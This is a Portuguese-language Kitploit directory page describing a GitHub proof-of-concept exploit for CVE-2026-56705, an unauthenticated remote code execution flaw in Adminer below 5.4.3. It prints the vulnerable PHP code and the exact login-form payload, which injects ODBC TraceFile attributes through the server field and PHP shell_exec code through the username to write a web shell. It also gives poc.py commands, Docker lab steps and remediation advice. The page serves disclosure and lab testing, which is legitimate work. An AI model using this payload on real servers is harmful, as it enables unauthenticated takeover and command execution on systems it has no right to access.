Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-56705 — Exploit de PoC para Adminer < 5.4.3 RCE não autenticado via injeção de DSN PDO MSSQL, incluindo laboratório Docker e teste negativo. | Kitploit
Ferramentas/GitHubGitHub/boreas37/cve-2026-56705
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed TeamingLabs e Prática
GitHubboreas37/cve-2026-56705

CVE-2026-56705

Exploit de PoC para Adminer < 5.4.3 RCE não autenticado via injeção de DSN PDO MSSQL, incluindo laboratório Docker e teste negativo.

Ver Repositório
218há 21 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-56705: Adminer < 5.4.3 — RCE não autenticado via injeção de DSN PDO MSSQL

CVECVE-2026-56705
GHSAGHSA-r4x9-5m63-3vxw (aviso do fornecedor) / GHSA-34q8-53jm-qc2r (banco de dados GitHub)
ProdutoAdminer (ferramenta de gerenciamento de banco de dados PHP em arquivo único)
AfetadoAdminer < 5.4.3 com pdo_sqlsrv + Microsoft ODBC Driver for SQL Server
Corrigido em5.4.3
CVSS9.8 Crítico (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
TipoCWE-20 → gravação arbitrária de arquivo não autenticada → RCE

Resumo

O Adminer não sanitiza o campo server fornecido pelo usuário antes de construir o DSN PDO para conexões MSSQL:

root@kitploit:~
// adminer/drivers/mssql.inc.php
function attach(string $server, string $username, string $password): string {
    list($host, $port) = host_port($server);
    return $this->dsn("sqlsrv:Server=$host" . ($port ? ",$port" : ""), $username, $password);
}

Pontos e vírgulas em server são tratados como delimitadores de atributos de conexão ODBC, portanto, um atacante não autenticado pode anexar atributos arbitrários ao DSN — incluindo TraceFile e TraceOn. O recurso de rastreamento do unixODBC grava a string de conexão completa (com UID={username} literal) em TraceFile antes e independentemente de a tentativa de conexão ser bem-sucedida. Injetar código PHP através do campo username e apontar TraceFile para a raiz da web produz um web shell.

Um único POST de login não autenticado é suficiente. Sem credenciais válidas, sem interação do usuário.

Exploração

root@kitploit:~
auth[driver]   = mssql
auth[server]   = 127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
auth[username] = <?php echo 'POC::'.shell_exec($_GET['c']);?>
auth[password] = x
  1. O POST de login constrói o DSN sqlsrv:Server=127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
  2. O gerenciador de driver ODBC grava um rastreamento contendo UID={<?php ... ?>} em /var/www/shell.php
  3. A conexão falha (esperado, irrelevante) — o arquivo já foi gravado
  4. GET /shell.php?c=id → o comando é executado

Uso

root@kitploit:~
# apenas fingerprint
python3 poc.py --target http://target/adminer.php --check

# exploit completo (grava <random>.php na raiz da web)
python3 poc.py --target http://target/adminer.php --command "id"

Reprodução em laboratório

root@kitploit:~
cd lab/
docker build -t adminer-cve-2026-56705 .
docker run -d -p 8081:8081 adminer-cve-2026-56705
python3 ../poc.py --target http://localhost:8081/adminer.php --command id

A imagem do laboratório espelha exatamente os pré-requisitos do aviso: php:8.3-cli + pdo_sqlsrv (pecl) + msodbcsql18, raiz da web gravável pelo processo PHP.

Remediação

  • Atualize para Adminer 5.4.3+.
  • Se não puder atualizar imediatamente: remova/bloqueie o driver mssql, ou remova ; (e espaços em branco) dos valores de server fornecidos pelo usuário em um proxy reverso.
  • Restrinja a raiz da web contra gravações do usuário PHP-FPM/CLI como defesa em profundidade.

Crédito

O aviso do fornecedor credita a descoberta conjuntamente ao relator e a Yashar Shahinzadeh (@voorivex).

PoC e laboratório: Hamza Cagrici (@Boreas37)

Linha do tempo

DataEvento
2026-08-25CVE publicado / corrigido no Adminer 5.4.3
Baixar ferramenta